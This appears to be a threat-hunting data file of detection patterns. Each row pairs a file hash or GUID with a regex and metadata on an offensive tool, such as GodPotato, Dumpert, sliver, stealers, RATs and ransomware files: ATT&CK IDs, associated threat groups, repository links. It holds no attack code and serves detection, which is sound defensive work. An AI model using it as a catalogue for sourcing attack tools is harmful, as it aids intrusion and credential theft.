"*3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858*",".{0,1000}3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","24166"
"*303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096*",".{0,1000}303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24171"
"*30444d3f4f3bedc5d6aac36ad4deb9ce32d2ac91eb0b30e590f702b06825f372*",".{0,1000}30444d3f4f3bedc5d6aac36ad4deb9ce32d2ac91eb0b30e590f702b06825f372.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#filehash","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","24172"
"*304900fc65b3540b7ae14e9c8813311caea7b57d1ce54b7c519adefee9a60e9f*",".{0,1000}304900fc65b3540b7ae14e9c8813311caea7b57d1ce54b7c519adefee9a60e9f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24173"
"*304a4ce184f84b3d8e138e8c070cc82854c637559bc2c4a0e6d59fa94fdfa10d*",".{0,1000}304a4ce184f84b3d8e138e8c070cc82854c637559bc2c4a0e6d59fa94fdfa10d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24174"
"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*",".{0,1000}304D5A8A\-EF98\-4E21\-8F4D\-91E66E0BECAC.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24175"
"*305f49e1b101e3a479f9da65f7852ad4aa2870198d9491b0166abfe07ae2a95c*",".{0,1000}305f49e1b101e3a479f9da65f7852ad4aa2870198d9491b0166abfe07ae2a95c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24177"
"*30614c74a863ad156d72f5f00405a87ad098b59fc6e45eaaa1f78cab7222c29c*",".{0,1000}30614c74a863ad156d72f5f00405a87ad098b59fc6e45eaaa1f78cab7222c29c.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","24179"
"*3063cb48a6a184bcc77efdf9c5753b7ffc1c4e5a4f5d10619b7741d1d1789a40*",".{0,1000}3063cb48a6a184bcc77efdf9c5753b7ffc1c4e5a4f5d10619b7741d1d1789a40.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24180"
"*307088B9-2992-4DE7-A57D-9E657B1CE546*",".{0,1000}307088B9\-2992\-4DE7\-A57D\-9E657B1CE546.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#GUIDproject","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","24182"
"*307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62*",".{0,1000}307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24185"
"*307925f20e73a5b32e5a5b260398f3b838f9966c1dc4e7913d3036fbb52d4508*",".{0,1000}307925f20e73a5b32e5a5b260398f3b838f9966c1dc4e7913d3036fbb52d4508.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24186"
"*307e2e6e52992a452f593a7a0c3c04753717949c11b0d43fbd47d44ddb6854d4*",".{0,1000}307e2e6e52992a452f593a7a0c3c04753717949c11b0d43fbd47d44ddb6854d4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24187"
"*307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59*",".{0,1000}307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","24188"
"*30859c25f2d9763bf4a8416c82d125bb11168e48f0527ee36741977bee0354ac*",".{0,1000}30859c25f2d9763bf4a8416c82d125bb11168e48f0527ee36741977bee0354ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24190"
"*30939d4bfbff459b8de9419897dbd48b10032790935f175c39796cbb605651fd*",".{0,1000}30939d4bfbff459b8de9419897dbd48b10032790935f175c39796cbb605651fd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24194"
"*30953a500fc7c834d7796b370c290d978e11a090dc28a62e5753467f1d00da7c*",".{0,1000}30953a500fc7c834d7796b370c290d978e11a090dc28a62e5753467f1d00da7c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24195"
"*30995a0eee6dda0cef60b94e666eae8ba42efd818217e7fcf798e8bc8d1e1e17*",".{0,1000}30995a0eee6dda0cef60b94e666eae8ba42efd818217e7fcf798e8bc8d1e1e17.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24196"
"*309a7793f785eec671771cbf3bdb33f17cfd71702d0bfc482f6780c8aaa66876*",".{0,1000}309a7793f785eec671771cbf3bdb33f17cfd71702d0bfc482f6780c8aaa66876.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24198"
"*309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94*",".{0,1000}309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","24199"
"*30a4f702dd51a4c04de7f62966622a6a85a77c77f5587e880a2d46b8e93325e5*",".{0,1000}30a4f702dd51a4c04de7f62966622a6a85a77c77f5587e880a2d46b8e93325e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24200"
"*30a7e68f32b0c23d57cba6941e7f990fa147e47facb387085b26e3a16c37f0df*",".{0,1000}30a7e68f32b0c23d57cba6941e7f990fa147e47facb387085b26e3a16c37f0df.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","24201"
"*30ae46c2d4af520064374b822bdbc1bbce8dfb67a1280dc6b4461c67aa3289f0*",".{0,1000}30ae46c2d4af520064374b822bdbc1bbce8dfb67a1280dc6b4461c67aa3289f0.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","24202"
"*30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454*",".{0,1000}30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24203"
"*30B8883F-A0A2-4256-ADCF-A790525D3696*",".{0,1000}30B8883F\-A0A2\-4256\-ADCF\-A790525D3696.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24205"
"*30be4c2b3d3ce434211fc4f788fff62849baecdb847b41b554da47f7c2c7b284*",".{0,1000}30be4c2b3d3ce434211fc4f788fff62849baecdb847b41b554da47f7c2c7b284.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24206"
"*30c5d870db5787b40d4ccd8e311a03805aed56149d5f183f0d29c51643053782*",".{0,1000}30c5d870db5787b40d4ccd8e311a03805aed56149d5f183f0d29c51643053782.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24208"
"*30ca8fd888d811b831b16e08c4c3d7cd5c403d2a3beca111b7f9587fe4ceb17c*",".{0,1000}30ca8fd888d811b831b16e08c4c3d7cd5c403d2a3beca111b7f9587fe4ceb17c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24209"
"*30cb4b65148413d62c04a83891b7dda36fb70d4699d02a5758e9122a833b8e73*",".{0,1000}30cb4b65148413d62c04a83891b7dda36fb70d4699d02a5758e9122a833b8e73.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","24210"
"*30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca*",".{0,1000}30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24211"
"*30D66EE9B5168E6E03F7E57F4A0CEA711CCC8BB69F911E143626F50DAA67D660*",".{0,1000}30D66EE9B5168E6E03F7E57F4A0CEA711CCC8BB69F911E143626F50DAA67D660.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24212"
"*30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6*",".{0,1000}30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24213"
"*30d8c28dd9f77268fd3fac0b3cb666886623e99bb681c6484d8cd1dd995cd606*",".{0,1000}30d8c28dd9f77268fd3fac0b3cb666886623e99bb681c6484d8cd1dd995cd606.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24214"
"*30e270d972931c04fef43bb97b99a1d2f83cb87e26c65d2deb8c6e2fe4854630*",".{0,1000}30e270d972931c04fef43bb97b99a1d2f83cb87e26c65d2deb8c6e2fe4854630.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","24217"
"*30e59e027270c23d6ffe6b89e2f149d5da63533e07e8f365fee9704dd722f002*",".{0,1000}30e59e027270c23d6ffe6b89e2f149d5da63533e07e8f365fee9704dd722f002.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24218"
"*30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0*",".{0,1000}30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24219"
"*30e7fd50bce6e345e3a83a1ead175bccb2b388b0b95bd11b36095a8928fb796c*",".{0,1000}30e7fd50bce6e345e3a83a1ead175bccb2b388b0b95bd11b36095a8928fb796c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24220"
"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*",".{0,1000}30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","24221"
"*30fb8b27a7636a8922aff3018b2b612bf224a17bf7a9c9f2f2a01d4f7754c522*",".{0,1000}30fb8b27a7636a8922aff3018b2b612bf224a17bf7a9c9f2f2a01d4f7754c522.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#filehash","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","24222"
"*310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7*",".{0,1000}310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24227"
"*310FC5BE-6F5E-479C-A246-6093A39296C0*",".{0,1000}310FC5BE\-6F5E\-479C\-A246\-6093A39296C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","24229"
"*31108a00a2c2016b0fb4d0e39fb2dbdce141ce9accf9ca0b2cbc47ab2f377cb8*",".{0,1000}31108a00a2c2016b0fb4d0e39fb2dbdce141ce9accf9ca0b2cbc47ab2f377cb8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24230"
"*31113cca78db9828b1fb6c8f39cd227129049a64dc645fc6fa12cc9aec4eec56*",".{0,1000}31113cca78db9828b1fb6c8f39cd227129049a64dc645fc6fa12cc9aec4eec56.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","24231"
"*3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0*",".{0,1000}3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24232"
"*31218c2e08ddf852de490f4d48d3d5751c3bc66ae9a73c815421dd20cd6b748e*",".{0,1000}31218c2e08ddf852de490f4d48d3d5751c3bc66ae9a73c815421dd20cd6b748e.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","24234"
"*312a47c833f5ea3eb3e1f8f3a26c9bbc811a1a4b389c432715ea8f040826f65f*",".{0,1000}312a47c833f5ea3eb3e1f8f3a26c9bbc811a1a4b389c432715ea8f040826f65f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24235"
